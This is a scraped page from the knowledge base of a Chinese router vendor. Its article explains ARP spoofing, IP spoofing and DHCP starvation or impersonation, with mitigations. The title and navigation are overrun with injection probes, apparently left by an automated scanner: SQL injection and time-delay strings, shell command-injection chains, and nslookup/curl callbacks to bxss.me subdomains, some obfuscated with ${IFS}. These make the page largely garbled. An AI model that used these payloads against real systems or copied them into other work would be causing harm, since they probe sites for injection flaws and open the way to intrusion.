-1' OR 374=374 or 'mF5u9TGo'=' - 知识库文章-艾泰科技

产品中心

企业级路由器

echo vzcrma$()\ skxhiw\nz^xyu||a #' &echo vzcrma$()\ skxhiw\nz^xyu||a #|" &echo vzcrma$()\ skxhiw\nz^xyu||a #

&echo epttrz$()\ sbvgba\nz^xyu||a #' &echo epttrz$()\ sbvgba\nz^xyu||a #|" &echo epttrz$()\ sbvgba\nz^xyu||a #

lxbfYeaa&echo roixkv$()\ pqhifg\nz^xyu||a #' &echo roixkv$()\ pqhifg\nz^xyu||a #|" &echo roixkv$()\ pqhifg\nz^xyu||a #

|echo vaxfto$()\ bfpegd\nz^xyu||a #' |echo vaxfto$()\ bfpegd\nz^xyu||a #|" |echo vaxfto$()\ bfpegd\nz^xyu||a #

lxbfYeaa|echo xwnjui$()\ cfxjwx\nz^xyu||a #' |echo xwnjui$()\ cfxjwx\nz^xyu||a #|" |echo xwnjui$()\ cfxjwx\nz^xyu||a #

expr 9000750623 - 977544

(nslookup -q=cname hitxhxuagstyq35058.bxss.me||curl hitxhxuagstyq35058.bxss.me))

$(nslookup -q=cname hitspufvnrtis0220d.bxss.me||curl hitspufvnrtis0220d.bxss.me)

&nslookup -q=cname hitysfpkbnuke1e268.bxss.me&'\"`0&nslookup -q=cname hitysfpkbnuke1e268.bxss.me&`'

&(nslookup -q=cname hitriplecwmlj68c71.bxss.me||curl hitriplecwmlj68c71.bxss.me)&'\"`0&(nslookup -q=cname hitriplecwmlj68c71.bxss.me||curl hitriplecwmlj68c71.bxss.me)&`'

|(nslookup -q=cname hitqoizootwzud653e.bxss.me||curl hitqoizootwzud653e.bxss.me)

lxbfYeaa'&&sleep(27*1000)*rqcaap&&'

`(nslookup -q=cname hitmkjimoufyj09ec8.bxss.me||curl hitmkjimoufyj09ec8.bxss.me)`

;(nslookup -q=cname hitnqpjnbdxkvb0bb3.bxss.me||curl hitnqpjnbdxkvb0bb3.bxss.me)|(nslookup -q=cname hitnqpjnbdxkvb0bb3.bxss.me||curl hitnqpjnbdxkvb0bb3.bxss.me)&(nslookup -q=cname hitnqpjnbdxkvb0bb3.bxss.me||curl hitnqpjnbdxkvb0bb3.bxss.me)

lxbfYeaa"&&sleep(27*1000)*sbpckp&&"

|(nslookup${IFS}-q${IFS}cname${IFS}hitclfiuqdslv37310.bxss.me||curl${IFS}hitclfiuqdslv37310.bxss.me)

lxbfYeaa'||sleep(27*1000)*yvlczf||'

&(nslookup${IFS}-q${IFS}cname${IFS}hitljbybigsfb143fe.bxss.me||curl${IFS}hitljbybigsfb143fe.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitljbybigsfb143fe.bxss.me||curl${IFS}hitljbybigsfb143fe.bxss.me)&`'

lxbfYeaa"||sleep(27*1000)*lqcltm||"

企业级无线路由器

lxbfYeaabuRDC5lu

lxbfYeaa' AND 2*3*8=6*8 AND 'uMxp'='uMxp

lxbfYeaa" AND 2*3*8=6*8 AND "ZJo6"="ZJo6

lxbfYeaa%' AND 2*3*8=6*8 AND 'z8Cx'!='z8Cx%

lxbfYeaahYG8jINu'; waitfor delay '0:0:15' --

lxbfYeaahpo5yDZB' OR 201=(SELECT 201 FROM PG_SLEEP(15))--

lxbfYeaaIYsp9IZ5') OR 930=(SELECT 930 FROM PG_SLEEP(15))--

lxbfYeaa8SuFVq1W')) OR 630=(SELECT 630 FROM PG_SLEEP(15))--

@@U4Q9C

lxbfYeaa'"()&%

lxbfYeaa'"()&%

'"()&%

'"()&%

lxbfYeaa9884590

lxbfYeaa9438988

lxbfYeaa'"()&%

'"()&%

lxbfYeaa9932083

1FBAOSFMA3G0

xfs.bxss.me

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'"

知识库与软件

-1' OR 374=374 or 'mF5u9TGo'='

文档编号:931
浏览:8680 评分:40
最后更新于:2011-06-30

企业网常见攻击方式及威胁

针对企业网络的攻击方式和企业网络所面临的安全威胁多种多样，任何一个恶意的攻击或者误操作都将会对企业网络造成破坏，给企业带来或大或小的经济损失。下面就对目前最常见的一些攻击方式和企业网络的薄弱环节进行说明。

ARP欺骗攻击（如图1所示）：ARP攻击的原理是通过伪装源MAC地址发送ARP响应包，对其他终端的高速缓存进行攻击。从而在网络中产生大量的ARP广播包使网络阻塞或实现“man in the middle”进行ARP重定向和嗅探攻击。

图1

IP地址欺骗（如图2）：恶意用户可以通过伪装源IP攻击主机或服务器，非法获取企业内部资料。或者用户随意修改自己的IP地址也会造成大量IP地址冲突,或导致内网断线。

图2

DHCP的DOS攻击（图3）：DHCP服务器中的地址被安装有相关黑客工具的客户端耗尽，从而无法响应正常的DHCP请求，造成合法用户无法获取到IP地址，从而无法正常的访问网络资源。

图3

DHCP服务器的冒充（如图4）：黑客非法接入网络并冒充DHCP服务器，轻则用户终端获取不到正确的IP地址信息，引起终端与终端间、终端与服务器间不能通信；重则用户终端获取到不安全的IP信息，造成中间人攻击或网络钓鱼。

图4

综述：当内网存在ARP欺骗攻击，建议做IP/MAC的双向绑定解决；如果内网使用了艾泰的管理型交换机，可通过交换机的IP/MAC/PORT的三元绑定来解决。如果内网电脑获取不到IP，或者获取到了与路由器LAN口不在同一网段的IP，可以查看路由器的DHCP地址池中的地址是否被耗尽；或者内网还存在其他的DHCP Server，找到这台网络设备并将DHCP服务关闭，以解决其所带来的影响。

解决方案
更多成功案例

关注艾泰

微博 · 企业版
微信 · 公众平台
艾泰艾网络APP

行业解决方案

案例解析

技术与支持

服务